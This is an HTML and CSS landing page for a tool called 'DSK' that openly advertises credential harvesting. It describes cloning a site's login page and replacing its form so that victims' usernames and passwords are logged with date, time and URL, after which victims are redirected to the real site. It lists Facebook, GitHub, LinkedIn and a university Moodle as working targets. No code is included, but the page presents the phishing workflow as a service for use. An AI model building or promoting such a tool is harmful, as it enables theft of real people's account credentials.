<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>DSK</title>
    <style>
        p h1{
            color: white;
        }
        body
{
    background: black;
    font-size: 18px;
}
.head
{
    margin-top: 5%;
    margin-left: 10%;
    margin-right: 10%;
    background: white;
    padding: 25px;
    border-radius: 10px;
}

.form
{
    margin: 25px;
}
input
{
    margin: 20px;
    border: none;
    border-bottom: 3px solid black;
    font-size: 18px;
}

.submitbutton
{
    margin: 20px;
    color: white;
    background: black;
    padding: 10px;
    padding-left: 20px;
    padding-right: 20px;
    font-size: 18px;
    border-radius: 5px;
    cursor: pointer;
}

button
{
    padding: 10px;
    padding-left: 20px;
    padding-right: 20px;
    font-size: 18px;
    text-decoration: none;
    margin: 10px;
    color: white;
    background: black;
    padding: 8px;
    font-size: 18px;
    border-radius: 5px;
}

a
{
text-decoration: none;
color: white;
}

hr
{
    border: 2px solid black;
    border-radius: 5px;
}

table td,tr
{
    font-size: 18px;
    padding: 20px;
    border: 3px solid black;
    border-radius: 5px;
}

table th
{
    font-size: 26px;
    padding: 20px;
    border: 3px solid black;
    border-radius: 5px;
}

.navbuttons button
{
    background: white;
    color: black;
    border: 2px solid white;
    cursor: pointer;
}

select , select option
{
    font-size: 18px;
    text-decoration: none;
    margin: 20px;
    color: white;
    background: black;
    padding: 8px;
    font-size: 18px;
    border-radius: 5px;
}

input:focus
{
    outline: none;
}

button:focus
{
    outline: none;
}
    </style>
</head>
<body>
    <div class="head">
        <center>
                <h1>Welcome to DSK</h1>
                <p>You can perform creditional Harvesting using this application</p>
                <p>Just put the name of the website you want harvest the creditionals</p>
        </center>

    <ul>
        <h3>What our system does ?</h3>
        <li>First whenever you put an url of a website. it get captured by fallback url</li>
        <li>Then your given url get scrap by the our application and our application replace form tag by its own form tag</li>
        <li>When user puts his creditionals
            <ul>
                <li>His credentionals gets printed on the console</li>
                <li>And User's log gets stored in database along with following information</li>
                <ul>
                    <li>Date of login</li>
                    <li>Time of login</li>
                    <li>Username entered by user</li>
                    <li>Password entered by user</li>
                    <li>URL of accessed website</li>
                </ul>
                <li>Then the user gets redirected to a page</li>
                <li>Where he gets an "Loading, please wait" as message and gets redirected to original login page automatically</li>
            </ul>
        </li>
    </ul>

    <ul>
            <h3>What you get ?</h3>
            <li>You get all logs date-wise along with following information</li>
            <ul>
                    <li>Date of login</li>
                    <li>Time of login</li>
                    <li>Username entered by user</li>
                    <li>Password entered by user</li>
                    <li>URL of accessed website</li>
            </ul>
    </ul>

    <ul>
        <h3>This can get hacked...</h3>
        <li>Following are the websites which can be used for Credentional Harvesting</li>
        <ul>
            <li>facebook.com</li>
            <li>github.com</li>
            <li>moodle.mitaoe.ac.in</li>
            <li>heorku.com</li>
            <li>linkedin.com</li>
        </ul>
    </ul>

    <ul>
        <h3>This can't get hacked yet...</h3>
        <li>Following are the websites which can not be used for Credentional Harvesting</li>
        <ul>
            <li>mittyb634.000webhostapp.com</li>
            <li>gmail.com</li>
            <li>twitter.com</li>
        </ul>
    </ul>

</div>
</body>
</html>